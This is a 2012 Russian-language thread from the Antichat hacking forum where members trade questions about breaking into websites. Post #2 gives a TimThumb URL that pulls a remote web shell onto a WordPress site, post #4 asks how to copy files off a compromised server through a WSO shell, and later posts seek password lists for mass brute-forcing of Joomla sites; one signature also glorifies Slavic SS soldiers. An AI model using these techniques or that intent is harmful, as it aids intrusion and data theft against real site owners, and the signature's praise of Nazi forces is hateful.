HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.06.2012, 23:33
klb
Новичок
Регистрация: 19.04.2012
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от cat1vo  
А с чего ты взял, что там у тебя инлуд? И какая версия рнр, после обновления 5.3.4 (null байт) уже не работает!
5.2.11 пхп

но раскрутить никак не могу
 
Ответить с цитированием

  #2  
Старый 13.06.2012, 02:00
promarketing
Новичок
Регистрация: 05.08.2011
Сообщений: 14
Провел на форуме:
3814

Репутация: 0
По умолчанию

Word press TimThumb Уязвимость

/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
 
Ответить с цитированием

  #3  
Старый 13.06.2012, 02:11
Weil
Новичок
Регистрация: 06.06.2012
Сообщений: 1
Провел на форуме:
214

Репутация: 0
По умолчанию

Есть сайт на Drupal, с него недавно были удалены страницы(ранее существовали, теперь 404). Возможно ли создать(воссоздать) страницы с этими определенными именами? Скажем site/node/12345 - движек, я так понял, создает со случайным номером, а нужно именно с определенным!
 
Ответить с цитированием

  #4  
Старый 14.06.2012, 02:15
RuDefc0n
Познающий
Регистрация: 02.06.2012
Сообщений: 33
Провел на форуме:
7074

Репутация: 0
По умолчанию

Вопрос - чем удобнее всего рипать сайт?

Нужна некая программа, которая используя веб-шелл пройдется по указанным каталогам и сохранит файлы.

Ибо права на чтение есть, хочу сохранить для анализа на случай закрытия уязвимостей.

zipнуть и скачать не получается - объемы адские и не дает - "Internal Error", даже если по 1 каталогу выбирать. (Использую WSO)

Судя по всему стоит ограничение на время выполнения и ничего тут не сделать.

Плюс из всех команд на запуск доступно только proc_open
 
Ответить с цитированием

  #5  
Старый 15.06.2012, 02:04
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию

Подскажите, есть что под vBulletin 3.6.8

Спасибо
 
Ответить с цитированием

  #6  
Старый 15.06.2012, 02:27
boortyhuhtyu
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
Провел на форуме:
225312

Репутация: -6


По умолчанию

Цитата:
Сообщение от Pirotexnik  
Подскажите, есть что под vBulletin 3.6.8
Спасибо
xss было
 
Ответить с цитированием

  #7  
Старый 15.06.2012, 02:57
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию

А можно PoC?)
 
Ответить с цитированием

  #8  
Старый 17.06.2012, 23:54
Esse_rationa
Новичок
Регистрация: 16.06.2012
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"

Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)
 
Ответить с цитированием

  #9  
Старый 18.06.2012, 00:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Esse_rationa  
Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"
Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)
какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #10  
Старый 18.06.2012, 00:56
Esse_rationa
Новичок
Регистрация: 16.06.2012
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....
Возможно. Может я ошибаюсь. Повторюсь: "я пока что в изучении."

1. Софт для брута (именно Joomla) есть. Авторский. В паблике старые версии.

2. К нему прилагается небольшая база паролей (обычный .txt) пароли типа "admin, 12345" и т.д

Так вот той базе паролей для подбора, доверия нет (всего 70кб)

Пробиваемость с неё на уровне 1-max3% от общего кол-ва сайтов.

Собственно первоначальная просьба была направить меня в нужное русло поиска, или Лучше дать базу паролей для брута (пробиваемостью хотя бы 40-60%) Был бы очень благодарен!

Сейчас ориентироваться в обиллии разных баз для брута очень сложно. Их много, а я один ) Все проверить я физически не смогу.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.